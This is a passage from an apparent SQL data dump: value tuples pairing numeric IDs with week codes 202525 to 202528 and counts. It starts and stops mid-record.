0),(5256,1,'202525',10),(5259,1,'202525',10),(5359,1,'202525',10),(472,1,'202525',11),(2704,1,'202525',11),(2801,1,'202525',11),(2965,1,'202525',11),(3027,1,'202525',11),(3069,1,'202525',11),(3742,1,'202525',11),(4753,1,'202525',11),(5295,1,'202525',11),(5320,1,'202525',11),(5326,1,'202525',11),(5353,1,'202525',11),(2609,1,'202525',12),(3090,1,'202525',12),(3290,1,'202525',12),(3771,1,'202525',12),(4648,1,'202525',12),(4756,1,'202525',12),(4980,1,'202525',12),(5076,1,'202525',12),(5157,1,'202525',12),(5330,1,'202525',12),(1582,1,'202525',13),(1588,1,'202525',13),(3066,1,'202525',13),(4566,1,'202525',13),(4988,1,'202525',13),(5400,1,'202525',13),(5409,1,'202525',13),(3030,1,'202525',14),(3498,1,'202525',14),(4582,1,'202525',14),(5363,1,'202525',14),(5433,1,'202525',14),(467,1,'202525',15),(1586,1,'202525',15),(2775,1,'202525',15),(3226,1,'202525',15),(2809,1,'202525',16),(4520,1,'202525',16),(2804,1,'202525',17),(5356,1,'202525',17),(5397,1,'202525',18),(5420,1,'202525',18),(3023,1,'202525',19),(473,1,'202525',20),(5412,1,'202525',20),(2813,1,'202525',21),(470,1,'202525',24),(474,1,'202525',24),(487,1,'202525',26),(468,1,'202525',27),(5415,1,'202525',28),(87,1,'202525',31),(3781,1,'202525',31),(5406,1,'202525',31),(5428,1,'202525',31),(74,1,'202525',32),(108,1,'202525',32),(4930,1,'202525',33),(84,1,'202525',34),(5425,1,'202525',34),(5436,1,'202525',37),(3060,1,'202525',41),(5454,1,'202525',45),(91,1,'202525',46),(2904,1,'202525',48),(89,1,'202525',50),(5441,1,'202525',51),(335,1,'202525',55),(5449,1,'202525',55),(72,1,'202525',59),(2503,1,'202525',60),(76,1,'202525',65),(68,1,'202525',81),(80,1,'202525',2423),(9,1,'202525',4547),(2293,1,'202526',2),(2296,1,'202526',2),(1703,1,'202526',3),(1707,1,'202526',3),(1715,1,'202526',3),(2154,1,'202526',3),(2159,1,'202526',3),(2989,1,'202526',3),(3034,1,'202526',3),(3109,1,'202526',3),(3240,1,'202526',3),(3243,1,'202526',3),(3247,1,'202526',3),(3261,1,'202526',3),(3263,1,'202526',3),(3269,1,'202526',3),(3273,1,'202526',3),(3285,1,'202526',3),(3710,1,'202526',3),(3724,1,'202526',3),(4396,1,'202526',3),(4663,1,'202526',3),(4691,1,'202526',3),(4797,1,'202526',3),(4878,1,'202526',3),(5020,1,'202526',3),(5028,1,'202526',3),(106,1,'202526',4),(110,1,'202526',4),(1697,1,'202526',4),(1718,1,'202526',4),(1720,1,'202526',4),(1743,1,'202526',4),(1782,1,'202526',4),(2063,1,'202526',4),(2148,1,'202526',4),(2152,1,'202526',4),(2156,1,'202526',4),(2751,1,'202526',4),(3072,1,'202526',4),(3087,1,'202526',4),(3107,1,'202526',4),(3124,1,'202526',4),(3226,1,'202526',4),(3229,1,'202526',4),(3245,1,'202526',4),(3253,1,'202526',4),(3257,1,'202526',4),(3259,1,'202526',4),(3265,1,'202526',4),(3267,1,'202526',4),(3271,1,'202526',4),(3278,1,'202526',4),(3280,1,'202526',4),(3307,1,'202526',4),(3313,1,'202526',4),(3482,1,'202526',4),(3714,1,'202526',4),(3738,1,'202526',4),(3774,1,'202526',4),(4275,1,'202526',4),(4326,1,'202526',4),(4329,1,'202526',4),(4335,1,'202526',4),(4338,1,'202526',4),(4363,1,'202526',4),(4368,1,'202526',4),(4377,1,'202526',4),(4387,1,'202526',4),(4416,1,'202526',4),(4424,1,'202526',4),(4440,1,'202526',4),(4657,1,'202526',4),(4660,1,'202526',4),(4677,1,'202526',4),(4685,1,'202526',4),(4694,1,'202526',4),(4697,1,'202526',4),(4722,1,'202526',4),(4741,1,'202526',4),(4747,1,'202526',4),(4802,1,'202526',4),(4870,1,'202526',4),(5042,1,'202526',4),(5125,1,'202526',4),(5271,1,'202526',4),(1695,1,'202526',5),(1705,1,'202526',5),(1713,1,'202526',5),(1726,1,'202526',5),(1772,1,'202526',5),(2161,1,'202526',5),(2252,1,'202526',5),(2748,1,'202526',5),(2993,1,'202526',5),(3005,1,'202526',5),(3066,1,'202526',5),(3104,1,'202526',5),(3249,1,'202526',5),(3251,1,'202526',5),(3297,1,'202526',5),(3479,1,'202526',5),(3486,1,'202526',5),(3531,1,'202526',5),(3541,1,'202526',5),(3721,1,'202526',5),(3742,1,'202526',5),(3752,1,'202526',5),(4357,1,'202526',5),(4373,1,'202526',5),(4391,1,'202526',5),(4412,1,'202526',5),(4436,1,'202526',5),(4448,1,'202526',5),(4542,1,'202526',5),(4546,1,'202526',5),(4645,1,'202526',5),(4668,1,'202526',5),(4681,1,'202526',5),(4700,1,'202526',5),(4703,1,'202526',5),(4706,1,'202526',5),(4765,1,'202526',5),(4776,1,'202526',5),(4862,1,'202526',5),(4866,1,'202526',5),(4897,1,'202526',5),(4983,1,'202526',5),(5024,1,'202526',5),(5050,1,'202526',5),(5128,1,'202526',5),(5137,1,'202526',5),(5253,1,'202526',5),(5264,1,'202526',5),(5298,1,'202526',5),(485,1,'202526',6),(1722,1,'202526',6),(1732,1,'202526',6),(1739,1,'202526',6),(1745,1,'202526',6),(1747,1,'202526',6),(2297,1,'202526',6),(2617,1,'202526',6),(2658,1,'202526',6),(2911,1,'202526',6),(2964,1,'202526',6),(3079,1,'202526',6),(3090,1,'202526',6),(3127,1,'202526',6),(3275,1,'202526',6),(3287,1,'202526',6),(3430,1,'202526',6),(3438,1,'202526',6),(3727,1,'202526',6),(3731,1,'202526',6),(3746,1,'202526',6),(3749,1,'202526',6),(3771,1,'202526',6),(4238,1,'202526',6),(4332,1,'202526',6),(4382,1,'202526',6),(4404,1,'202526',6),(4408,1,'202526',6),(4428,1,'202526',6),(4432,1,'202526',6),(4444,1,'202526',6),(4524,1,'202526',6),(4551,1,'202526',6),(4582,1,'202526',6),(4608,1,'202526',6),(4612,1,'202526',6),(4712,1,'202526',6),(4753,1,'202526',6),(4759,1,'202526',6),(4858,1,'202526',6),(4874,1,'202526',6),(4883,1,'202526',6),(4893,1,'202526',6),(4980,1,'202526',6),(4988,1,'202526',6),(5046,1,'202526',6),(5122,1,'202526',6),(5131,1,'202526',6),(5134,1,'202526',6),(5268,1,'202526',6),(5323,1,'202526',6),(483,1,'202526',7),(570,1,'202526',7),(1600,1,'202526',7),(1709,1,'202526',7),(1711,1,'202526',7),(1724,1,'202526',7),(1730,1,'202526',7),(1737,1,'202526',7),(2248,1,'202526',7),(2609,1,'202526',7),(2809,1,'202526',7),(3006,1,'202526',7),(3038,1,'202526',7),(3096,1,'202526',7),(3498,1,'202526',7),(3764,1,'202526',7),(3777,1,'202526',7),(4454,1,'202526',7),(4514,1,'202526',7),(4651,1,'202526',7),(4688,1,'202526',7),(4744,1,'202526',7),(4756,1,'202526',7),(4762,1,'202526',7),(4792,1,'202526',7),(5033,1,'202526',7),(5080,1,'202526',7),(5146,1,'202526',7),(5256,1,'202526',7),(5292,1,'202526',7),(5353,1,'202526',7),(1614,1,'202526',8),(1699,1,'202526',8),(1728,1,'202526',8),(1749,1,'202526',8),(1770,1,'202526',8),(2165,1,'202526',8),(2775,1,'202526',8),(3041,1,'202526',8),(3063,1,'202526',8),(3282,1,'202526',8),(3290,1,'202526',8),(3316,1,'202526',8),(3489,1,'202526',8),(3534,1,'202526',8),(3735,1,'202526',8),(4341,1,'202526',8),(4457,1,'202526',8),(4517,1,'202526',8),(4529,1,'202526',8),(4654,1,'202526',8),(4768,1,'202526',8),(4771,1,'202526',8),(4888,1,'202526',8),(5153,1,'202526',8),(5248,1,'202526',8),(5276,1,'202526',8),(5289,1,'202526',8),(5295,1,'202526',8),(5301,1,'202526',8),(5304,1,'202526',8),(5314,1,'202526',8),(5317,1,'202526',8),(5326,1,'202526',8),(5378,1,'202526',8),(479,1,'202526',9),(480,1,'202526',9),(482,1,'202526',9),(1590,1,'202526',9),(1594,1,'202526',9),(1751,1,'202526',9),(1774,1,'202526',9),(1776,1,'202526',9),(1780,1,'202526',9),(2309,1,'202526',9),(2558,1,'202526',9),(2965,1,'202526',9),(3023,1,'202526',9),(3027,1,'202526',9),(3069,1,'202526',9),(3097,1,'202526',9),(3117,1,'202526',9),(4400,1,'202526',9),(4977,1,'202526',9),(4996,1,'202526',9),(5037,1,'202526',9),(5054,1,'202526',9),(5062,1,'202526',9),(5071,1,'202526',9),(5101,1,'202526',9),(5163,1,'202526',9),(5330,1,'202526',9),(5334,1,'202526',9),(5359,1,'202526',9),(5383,1,'202526',9),(102,1,'202526',10),(478,1,'202526',10),(484,1,'202526',10),(486,1,'202526',10),(488,1,'202526',10),(1584,1,'202526',10),(1586,1,'202526',10),(1592,1,'202526',10),(1610,1,'202526',10),(1768,1,'202526',10),(2178,1,'202526',10),(2457,1,'202526',10),(2704,1,'202526',10),(2801,1,'202526',10),(2991,1,'202526',10),(3004,1,'202526',10),(3045,1,'202526',10),(4556,1,'202526',10),(5140,1,'202526',10),(5310,1,'202526',10),(5320,1,'202526',10),(5356,1,'202526',10),(5374,1,'202526',10),(5472,1,'202526',10),(471,1,'202526',11),(472,1,'202526',11),(481,1,'202526',11),(1604,1,'202526',11),(1606,1,'202526',11),(1741,1,'202526',11),(2813,1,'202526',11),(2956,1,'202526',11),(3030,1,'202526',11),(4591,1,'202526',11),(4750,1,'202526',11),(4976,1,'202526',11),(5067,1,'202526',11),(5280,1,'202526',11),(5363,1,'202526',11),(1582,1,'202526',12),(1766,1,'202526',12),(1778,1,'202526',12),(2804,1,'202526',12),(5058,1,'202526',12),(477,1,'202526',13),(1612,1,'202526',13),(4301,1,'202526',13),(4709,1,'202526',13),(5412,1,'202526',13),(2150,1,'202526',14),(3083,1,'202526',14),(4520,1,'202526',14),(5307,1,'202526',14),(467,1,'202526',15),(468,1,'202526',15),(469,1,'202526',15),(1734,1,'202526',15),(2769,1,'202526',15),(4566,1,'202526',15),(5259,1,'202526',15),(5467,1,'202526',15),(470,1,'202526',16),(476,1,'202526',16),(487,1,'202526',16),(1544,1,'202526',16),(3092,1,'202526',16),(3102,1,'202526',16),(1598,1,'202526',17),(5157,1,'202526',17),(5409,1,'202526',17),(5433,1,'202526',17),(1588,1,'202526',18),(1701,1,'202526',18),(3060,1,'202526',18),(5397,1,'202526',18),(74,1,'202526',19),(4323,1,'202526',19),(4648,1,'202526',19),(473,1,'202526',20),(5406,1,'202526',20),(1596,1,'202526',21),(5415,1,'202526',21),(1602,1,'202526',22),(4674,1,'202526',22),(108,1,'202526',23),(474,1,'202526',23),(84,1,'202526',24),(1608,1,'202526',24),(4587,1,'202526',24),(4930,1,'202526',24),(5400,1,'202526',24),(5420,1,'202526',25),(4420,1,'202526',28),(5449,1,'202526',28),(5454,1,'202526',28),(87,1,'202526',29),(5436,1,'202526',32),(2904,1,'202526',39),(5428,1,'202526',39),(91,1,'202526',41),(335,1,'202526',41),(2503,1,'202526',43),(3781,1,'202526',45),(76,1,'202526',46),(5461,1,'202526',47),(5425,1,'202526',52),(89,1,'202526',53),(5441,1,'202526',53),(5457,1,'202526',53),(5076,1,'202526',58),(68,1,'202526',66),(5464,1,'202526',66),(72,1,'202526',76),(5489,1,'202526',182),(80,1,'202526',2647),(9,1,'202526',4344),(3267,1,'202527',3),(4700,1,'202527',3),(5071,1,'202527',3),(102,1,'202527',4),(106,1,'202527',4),(482,1,'202527',4),(483,1,'202527',4),(484,1,'202527',4),(1604,1,'202527',4),(1606,1,'202527',4),(1749,1,'202527',4),(2748,1,'202527',4),(3273,1,'202527',4),(3275,1,'202527',4),(4750,1,'202527',4),(5067,1,'202527',4),(5128,1,'202527',4),(5134,1,'202527',4),(5153,1,'202527',4),(5248,1,'202527',4),(5256,1,'202527',4),(5307,1,'202527',4),(5320,1,'202527',4),(5323,1,'202527',4),(5334,1,'202527',4),(5383,1,'202527',4),(481,1,'202527',5),(488,1,'202527',5),(1590,1,'202527',5),(1608,1,'202527',5),(1697,1,'202527',5),(1720,1,'202527',5),(1739,1,'202527',5),(2156,1,'202527',5),(2293,1,'202527',5),(2309,1,'202527',5),(2457,1,'202527',5),(2809,1,'202527',5),(2911,1,'202527',5),(2964,1,'202527',5),(2991,1,'202527',5),(3041,1,'202527',5),(3069,1,'202527',5),(3090,1,'202527',5),(3257,1,'202527',5),(3489,1,'202527',5),(3534,1,'202527',5),(3714,1,'202527',5),(3721,1,'202527',5),(3764,1,'202527',5),(4387,1,'202527',5),(4424,1,'202527',5),(4428,1,'202527',5),(4440,1,'202527',5),(4457,1,'202527',5),(4517,1,'202527',5),(4542,1,'202527',5),(4546,1,'202527',5),(4741,1,'202527',5),(4759,1,'202527',5),(4762,1,'202527',5),(4765,1,'202527',5),(4797,1,'202527',5),(4862,1,'202527',5),(5033,1,'202527',5),(5046,1,'202527',5),(5101,1,'202527',5),(5146,1,'202527',5),(5268,1,'202527',5),(5310,1,'202527',5),(5326,1,'202527',5),(5330,1,'202527',5),(5359,1,'202527',5),(477,1,'202527',6),(478,1,'202527',6),(570,1,'202527',6),(1588,1,'202527',6),(1594,1,'202527',6),(1598,1,'202527',6),(1718,1,'202527',6),(1724,1,'202527',6),(1726,1,'202527',6),(2152,1,'202527',6),(2154,1,'202527',6),(2178,1,'202527',6),(2658,1,'202527',6),(2804,1,'202527',6),(2956,1,'202527',6),(2993,1,'202527',6),(3005,1,'202527',6),(3006,1,'202527',6),(3072,1,'202527',6),(3092,1,'202527',6),(3107,1,'202527',6),(3245,1,'202527',6),(3247,1,'202527',6),(3253,1,'202527',6),(3259,1,'202527',6),(3261,1,'202527',6),(3265,1,'202527',6),(3269,1,'202527',6),(3282,1,'202527',6),(3287,1,'202527',6),(3430,1,'202527',6),(3727,1,'202527',6),(4275,1,'202527',6),(4326,1,'202527',6),(4329,1,'202527',6),(4338,1,'202527',6),(4357,1,'202527',6),(4363,1,'202527',6),(4368,1,'202527',6),(4373,1,'202527',6),(4382,1,'202527',6),(4391,1,'202527',6),(4396,1,'202527',6),(4404,1,'202527',6),(4408,1,'202527',6),(4432,1,'202527',6),(4436,1,'202527',6),(4444,1,'202527',6),(4448,1,'202527',6),(4514,1,'202527',6),(4524,1,'202527',6),(4608,1,'202527',6),(4681,1,'202527',6),(4694,1,'202527',6),(4753,1,'202527',6),(4792,1,'202527',6),(4866,1,'202527',6),(4878,1,'202527',6),(4893,1,'202527',6),(4983,1,'202527',6),(4996,1,'202527',6),(5042,1,'202527',6),(5050,1,'202527',6),(5058,1,'202527',6),(5076,1,'202527',6),(5080,1,'202527',6),(5122,1,'202527',6),(5125,1,'202527',6),(5131,1,'202527',6),(5163,1,'202527',6),(5264,1,'202527',6),(5271,1,'202527',6),(476,1,'202527',7),(1584,1,'202527',7),(1596,1,'202527',7),(1600,1,'202527',7),(1612,1,'202527',7),(1695,1,'202527',7),(1699,1,'202527',7),(1707,1,'202527',7),(1713,1,'202527',7),(1722,1,'202527',7),(1734,1,'202527',7),(1737,1,'202527',7),(1743,1,'202527',7),(1747,1,'202527',7),(1772,1,'202527',7),(1774,1,'202527',7),(1782,1,'202527',7),(2063,1,'202527',7),(2148,1,'202527',7),(2159,1,'202527',7),(2161,1,'202527',7),(2296,1,'202527',7),(2558,1,'202527',7),(2751,1,'202527',7),(2965,1,'202527',7),(3063,1,'202527',7),(3097,1,'202527',7),(3124,1,'202527',7),(3249,1,'202527',7),(3263,1,'202527',7),(3278,1,'202527',7),(3297,1,'202527',7),(3307,1,'202527',7),(3316,1,'202527',7),(3479,1,'202527',7),(3486,1,'202527',7),(3731,1,'202527',7),(3735,1,'202527',7),(3742,1,'202527',7),(3777,1,'202527',7),(4301,1,'202527',7),(4335,1,'202527',7),(4377,1,'202527',7),(4400,1,'202527',7),(4412,1,'202527',7),(4416,1,'202527',7),(4529,1,'202527',7),(4566,1,'202527',7),(4645,1,'202527',7),(4648,1,'202527',7),(4688,1,'202527',7),(4691,1,'202527',7),(4706,1,'202527',7),(4722,1,'202527',7),(4747,1,'202527',7),(4858,1,'202527',7),(4870,1,'202527',7),(4874,1,'202527',7),(4897,1,'202527',7),(4976,1,'202527',7),(5137,1,'202527',7),(5276,1,'202527',7),(5280,1,'202527',7),(5301,1,'202527',7),(5304,1,'202527',7),(5353,1,'202527',7),(5374,1,'202527',7),(5397,1,'202527',7),(5433,1,'202527',7),(472,1,'202527',8),(480,1,'202527',8),(486,1,'202527',8),(1592,1,'202527',8),(1602,1,'202527',8),(1614,1,'202527',8),(1701,1,'202527',8),(1709,1,'202527',8),(1715,1,'202527',8),(1745,1,'202527',8),(1751,1,'202527',8),(1776,1,'202527',8),(2150,1,'202527',8),(2252,1,'202527',8),(2297,1,'202527',8),(2617,1,'202527',8),(2801,1,'202527',8),(3004,1,'202527',8),(3045,1,'202527',8),(3087,1,'202527',8),(3117,1,'202527',8),(3243,1,'202527',8),(3251,1,'202527',8),(3531,1,'202527',8),(3541,1,'202527',8),(3738,1,'202527',8),(3746,1,'202527',8),(3752,1,'202527',8),(3774,1,'202527',8),(4341,1,'202527',8),(4454,1,'202527',8),(4663,1,'202527',8),(4668,1,'202527',8),(4674,1,'202527',8),(4677,1,'202527',8),(4685,1,'202527',8),(4697,1,'202527',8),(4703,1,'202527',8),(4709,1,'202527',8),(4756,1,'202527',8),(4768,1,'202527',8),(4771,1,'202527',8),(4776,1,'202527',8),(4802,1,'202527',8),(4980,1,'202527',8),(4988,1,'202527',8),(5020,1,'202527',8),(5028,1,'202527',8),(5356,1,'202527',8),(110,1,'202527',9),(469,1,'202527',9),(471,1,'202527',9),(1728,1,'202527',9),(1730,1,'202527',9),(1732,1,'202527',9),(1780,1,'202527',9),(2248,1,'202527',9),(2813,1,'202527',9),(3066,1,'202527',9),(3096,1,'202527',9),(3102,1,'202527',9),(3104,1,'202527',9),(3109,1,'202527',9),(3229,1,'202527',9),(3240,1,'202527',9),(3280,1,'202527',9),(3313,1,'202527',9),(3438,1,'202527',9),(3482,1,'202527',9),(3724,1,'202527',9),(3749,1,'202527',9),(3771,1,'202527',9),(4551,1,'202527',9),(4582,1,'202527',9),(4657,1,'202527',9),(4883,1,'202527',9),(4888,1,'202527',9),(5024,1,'202527',9),(5054,1,'202527',9),(5062,1,'202527',9),(5253,1,'202527',9),(5292,1,'202527',9),(5317,1,'202527',9),(5363,1,'202527',9),(5400,1,'202527',9),(467,1,'202527',10),(479,1,'202527',10),(1544,1,'202527',10),(1741,1,'202527',10),(2165,1,'202527',10),(2769,1,'202527',10),(2775,1,'202527',10),(2989,1,'202527',10),(3034,1,'202527',10),(3038,1,'202527',10),(3226,1,'202527',10),(3271,1,'202527',10),(3285,1,'202527',10),(3710,1,'202527',10),(4323,1,'202527',10),(4332,1,'202527',10),(4712,1,'202527',10),(5295,1,'202527',10),(5298,1,'202527',10),(5314,1,'202527',10),(5378,1,'202527',10),(485,1,'202527',11),(1610,1,'202527',11),(1705,1,'202527',11),(1768,1,'202527',11),(1770,1,'202527',11),(1778,1,'202527',11),(3079,1,'202527',11),(3083,1,'202527',11),(3127,1,'202527',11),(4238,1,'202527',11),(4654,1,'202527',11),(4660,1,'202527',11),(5037,1,'202527',11),(5157,1,'202527',11),(5425,1,'202527',11),(5472,1,'202527',11),(2609,1,'202527',12),(3027,1,'202527',12),(3030,1,'202527',12),(3290,1,'202527',12),(3498,1,'202527',12),(4744,1,'202527',12),(5289,1,'202527',12),(5409,1,'202527',12),(1586,1,'202527',13),(4420,1,'202527',13),(4520,1,'202527',13),(4612,1,'202527',13),(5259,1,'202527',13),(5412,1,'202527',13),(5467,1,'202527',13),(1703,1,'202527',14),(1711,1,'202527',14),(4556,1,'202527',14),(470,1,'202527',15),(4977,1,'202527',15),(5140,1,'202527',15),(5420,1,'202527',15),(5428,1,'202527',15),(468,1,'202527',16),(1582,1,'202527',16),(2704,1,'202527',16),(5415,1,'202527',17),(473,1,'202527',18),(487,1,'202527',18),(1766,1,'202527',18),(4651,1,'202527',18),(5454,1,'202527',19),(5406,1,'202527',20),(474,1,'202527',21),(5436,1,'202527',22),(5449,1,'202527',22),(74,1,'202527',24),(3060,1,'202527',24),(5461,1,'202527',24),(108,1,'202527',25),(5464,1,'202527',25),(5457,1,'202527',26),(3023,1,'202527',27),(3781,1,'202527',27),(5492,1,'202527',28),(84,1,'202527',30),(4930,1,'202527',31),(5441,1,'202527',31),(335,1,'202527',39),(4591,1,'202527',40),(2503,1,'202527',43),(4587,1,'202527',43),(2904,1,'202527',44),(87,1,'202527',50),(89,1,'202527',51),(91,1,'202527',54),(76,1,'202527',55),(72,1,'202527',72),(5489,1,'202527',78),(68,1,'202527',88),(80,1,'202527',2104),(9,1,'202527',3828),(4797,1,'202528',1),(110,1,'202528',2),(1713,1,'202528',2),(1743,1,'202528',2),(1776,1,'202528',2),(2148,1,'202528',2),(2152,1,'202528',2),(2161,1,'202528',2),(2293,1,'202528',2),(2609,1,'202528',2),(2751,1,'202528',2),(3109,1,'202528',2),(3243,1,'202528',2),(3247,1,'202528',2),(3267,1,'202528',2),(3278,1,'202528',2),(4363,1,'202528',2),(4436,1,'202528',2),(4440,1,'202528',2),(4703,1,'202528',2),(4802,1,'202528',2),(106,1,'202528',3),(1590,1,'202528',3),(1606,1,'202528',3),(1711,1,'202528',3),(1715,1,'202528',3),(1720,1,'202528',3),(1726,1,'202528',3),(1749,1,'202528',3),(1774,1,'202528',3),(2156,1,'202528',3),(2165,1,'202528',3),(2178,1,'202528',3),(2297,1,'202528',3),(2617,1,'202528',3),(3041,1,'202528',3),(3079,1,'202528',3),(3240,1,'202528',3),(3245,1,'202528',3),(3263,1,'202528',3),(3265,1,'202528',3),(3746,1,'202528',3),(4326,1,'202528',3),(4338,1,'202528',3),(4341,1,'202528',3),(4373,1,'202528',3),(4382,1,'202528',3),(4387,1,'202528',3),(4412,1,'202528',3),(4424,1,'202528',3),(4542,1,'202528',3),(4546,1,'202528',3),(4612,1,'202528',3),(4648,1,'202528',3),(4700,1,'202528',3),(4722,1,'202528',3),(4768,1,'202528',3),(4862,1,'202528',3),(4874,1,'202528',3),(5024,1,'202528',3),(5046,1,'202528',3),(5076,1,'202528',3),(102,1,'202528',4),(486,1,'202528',4),(1695,1,'202528',4),(1697,1,'202528',4),(1699,1,'202528',4),(1709,1,'202528',4),(1722,1,'202528',4),(1734,1,'202528',4),(1747,1,'202528',4),(2063,1,'202528',4),(2248,1,'202528',4),(2296,1,'202528',4),(2457,1,'202528',4),(2748,1,'202528',4),(2991,1,'202528',4),(2993,1,'202528',4),(3005,1,'202528',4),(3030,1,'202528',4),(3034,1,'202528',4),(3072,1,'202528',4),(3090,1,'202528',4),(3107,1,'202528',4),(3229,1,'202528',4),(3249,1,'202528',4),(3257,1,'202528',4),(3261,1,'202528',4),(3273,1,'202528',4),(3280,1,'202528',4),(3285,1,'202528',4),(3287,1,'202528',4),(3313,1,'202528',4),(3727,1,'202528',4),(3738,1,'202528',4),(4275,1,'202528',4),(4335,1,'202528',4),(4357,1,'202528',4),(4377,1,'202528',4),(4396,1,'202528',4),(4404,1,'202528',4),(4408,1,'202528',4),(4428,1,'202528',4),(4432,1,'202528',4),(4444,1,'202528',4),(4448,1,'202528',4),(4454,1,'202528',4),(4517,1,'202528',4),(4556,1,'202528',4),(4663,1,'202528',4),(4668,1,'202528',4),(4674,1,'202528',4),(4681,1,'202528',4),(4691,1,'202528',4),(4697,1,'202528',4),(4744,1,'202528',4),(4792,1,'202528',4),(4858,1,'202528',4),(4870,1,'202528',4),(4878,1,'202528',4),(4883,1,'202528',4),(4977,1,'202528',4),(5020,1,'202528',4),(5028,1,'202528',4),(5037,1,'202528',4),(5042,1,'202528',4),(5248,1,'202528',4),(5280,1,'202528',4),(472,1,'202528',5),(483,1,'202528',5),(1596,1,'202528',5),(1600,1,'202528',5),(1608,1,'202528',5),(1610,1,'202528',5),(1703,1,'202528',5),(1705,1,'202528',5),(1707,1,'202528',5),(1741,1,'202528',5),(1751,1,'202528',5),(1772,1,'202528',5),(2150,1,'202528',5),(2154,1,'202528',5),(2159,1,'202528',5),(2558,1,'202528',5),(2965,1,'202528',5),(3038,1,'202528',5),(3066,1,'202528',5),(3092,1,'202528',5),(3127,1,'202528',5),(3226,1,'202528',5),(3269,1,'202528',5),(3271,1,'202528',5),(3275,1,'202528',5),(3307,1,'202528',5),(3486,1,'202528',5),(3714,1,'202528',5),(3749,1,'202528',5),(3752,1,'202528',5),(3771,1,'202528',5),(4368,1,'202528',5),(4457,1,'202528',5),(4514,1,'202528',5),(4582,1,'202528',5),(4608,1,'202528',5),(4645,1,'202528',5),(4654,1,'202528',5),(4657,1,'202528',5),(4685,1,'202528',5),(4706,1,'202528',5),(4747,1,'202528',5),(4771,1,'202528',5),(4893,1,'202528',5),(4897,1,'202528',5),(4983,1,'202528',5),(4988,1,'202528',5),(5050,1,'202528',5),(5067,1,'202528',5),(5253,1,'202528',5),(5264,1,'202528',5),(5326,1,'202528',5),(5330,1,'202528',5),(5359,1,'202528',5),(5467,1,'202528',5),(479,1,'202528',6),(1588,1,'202528',6),(1594,1,'202528',6),(1602,1,'202528',6),(1718,1,'202528',6),(1724,1,'202528',6),(1728,1,'202528',6),(1737,1,'202528',6),(1780,1,'202528',6),(1782,1,'202528',6),(2252,1,'202528',6),(2658,1,'202528',6),(2769,1,'202528',6),(2911,1,'202528',6),(2989,1,'202528',6),(3006,1,'202528',6),(3027,1,'202528',6),(3096,1,'202528',6),(3102,1,'202528',6),(3253,1,'202528',6),(3282,1,'202528',6),(3721,1,'202528',6),(3731,1,'202528',6),(3735,1,'202528',6),(3742,1,'202528',6),(4323,1,'202528',6),(4551,1,'202528',6),(4566,1,'202528',6),(4677,1,'202528',6),(4688,1,'202528',6),(4759,1,'202528',6),(4762,1,'202528',6),(4765,1,'202528',6),(4866,1,'202528',6),(4888,1,'202528',6),(4976,1,'202528',6),(5054,1,'202528',6),(5080,1,'202528',6),(5101,1,'202528',6),(5128,1,'202528',6),(5146,1,'202528',6),(5163,1,'202528',6),(5268,1,'202528',6),(5289,1,'202528',6),(5356,1,'202528',6),(5383,1,'202528',6),(5472,1,'202528',6),(471,1,'202528',7),(480,1,'202528',7),(481,1,'202528',7),(482,1,'202528',7),(484,1,'202528',7),(488,1,'202528',7),(1604,1,'202528',7),(1730,1,'202528',7),(1739,1,'202528',7),(1745,1,'202528',7),(1768,1,'202528',7),(2801,1,'202528',7),(2964,1,'202528',7),(3063,1,'202528',7),(3097,1,'202528',7),(3104,1,'202528',7),(3117,1,'202528',7),(3290,1,'202528',7),(3316,1,'202528',7),(3482,1,'202528',7),(3531,1,'202528',7),(4238,1,'202528',7),(4301,1,'202528',7),(4329,1,'202528',7),(4660,1,'202528',7),(4694,1,'202528',7),(4709,1,'202528',7),(4712,1,'202528',7),(4753,1,'202528',7),(4756,1,'202528',7),(4980,1,'202528',7),(5033,1,'202528',7),(5071,1,'202528',7),(5122,1,'202528',7),(5125,1,'202528',7),(5134,1,'202528',7),(5153,1,'202528',7),(5271,1,'202528',7),(5292,1,'202528',7),(5295,1,'202528',7),(5301,1,'202528',7),(5304,1,'202528',7),(5307,1,'202528',7),(5317,1,'202528',7),(5320,1,'202528',7),(5323,1,'202528',7),(5334,1,'202528',7),(5353,1,'202528',7),(5374,1,'202528',7),(477,1,'202528',8),(478,1,'202528',8),(485,1,'202528',8),(570,1,'202528',8),(1584,1,'202528',8),(1770,1,'202528',8),(3045,1,'202528',8),(3069,1,'202528',8),(3259,1,'202528',8),(3534,1,'202528',8),(3774,1,'202528',8),(4400,1,'202528',8),(4420,1,'202528',8),(4529,1,'202528',8),(4651,1,'202528',8),(4741,1,'202528',8),(4750,1,'202528',8),(4996,1,'202528',8),(5058,1,'202528',8),(5131,1,'202528',8),(5259,1,'202528',8),(5298,1,'202528',8),(5310,1,'202528',8),(1614,1,'202528',9),(1778,1,'202528',9),(2704,1,'202528',9),(2809,1,'202528',9),(2956,1,'202528',9),(3004,1,'202528',9),(3087,1,'202528',9),(3124,1,'202528',9),(3297,1,'202528',9),(3430,1,'202528',9),(3438,1,'202528',9),(3541,1,'202528',9),(3710,1,'202528',9),(3777,1,'202528',9),(4332,1,'202528',9),(4524,1,'202528',9),(5157,1,'202528',9),(5256,1,'202528',9),(5276,1,'202528',9),(1592,1,'202528',10),(1612,1,'202528',10),(1766,1,'202528',10),(2775,1,'202528',10),(2804,1,'202528',10),(5062,1,'202528',10),(5137,1,'202528',10),(5314,1,'202528',10),(5363,1,'202528',10),(1701,1,'202528',11),(1732,1,'202528',11),(2309,1,'202528',11),(2813,1,'202528',11),(3023,1,'202528',11),(3083,1,'202528',11),(3251,1,'202528',11),(3479,1,'202528',11),(3489,1,'202528',11),(3498,1,'202528',11),(3724,1,'202528',11),(3764,1,'202528',11),(4391,1,'202528',11),(5378,1,'202528',11),(469,1,'202528',12),(476,1,'202528',12),(5415,1,'202528',12),(5425,1,'202528',12),(467,1,'202528',13),(473,1,'202528',13),(4776,1,'202528',13),(5397,1,'202528',13),(5412,1,'202528',13),(5436,1,'202528',13),(1598,1,'202528',14),(4520,1,'202528',14),(468,1,'202528',16),(5449,1,'202528',16),(470,1,'202528',17),(5400,1,'202528',17),(5406,1,'202528',17),(5461,1,'202528',17),(1544,1,'202528',18),(5140,1,'202528',19),(487,1,'202528',20),(1586,1,'202528',20),(5433,1,'202528',20),(84,1,'202528',21),(4930,1,'202528',21),(5409,1,'202528',21),(1582,1,'202528',22),(5420,1,'202528',22),(5489,1,'202528',22),(74,1,'202528',23),(5464,1,'202528',23),(108,1,'202528',24),(5492,1,'202528',25),(474,1,'202528',27),(5457,1,'202528',27),(3781,1,'202528',28),(5454,1,'202528',28),(4587,1,'202528',33),(5428,1,'202528',35),(87,1,'202528',38),(2503,1,